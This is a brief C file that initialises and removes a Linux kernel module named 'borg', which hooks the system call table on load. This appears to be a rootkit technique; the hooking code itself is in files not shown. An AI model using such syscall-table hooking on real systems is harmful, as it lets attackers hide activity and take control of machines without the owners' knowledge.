/**
 * @file borg.c
 * @brief LKM (de)initialization
 */

#include <linux/kernel.h>
#include <linux/module.h>
#include "borg.h"
#include "hook.h"
#include "process.h"

/**
 * Initialize us.
 * @return zero on success and false on error.
 */
int borg_init(void)
{
    _DEBUG(("%s: loading\n", BORG_VERSION));
    set_init_hook();
    return !syscall_table_find() && !syscall_table_hook();
}

/**
 * Deinitialize us.
 */
void borg_exit(void)
{
    _DEBUG(("%s: unloading\n", BORG_VERSION));
    syscall_table_unhook();
}

/** Declare us. */
MODULE_LICENSE(BORG_LICENSE);
MODULE_AUTHOR(BORG_AUTHOR);
MODULE_DESCRIPTION(BORG_DESCRIPTION);

module_init(borg_init);
module_exit(borg_exit);
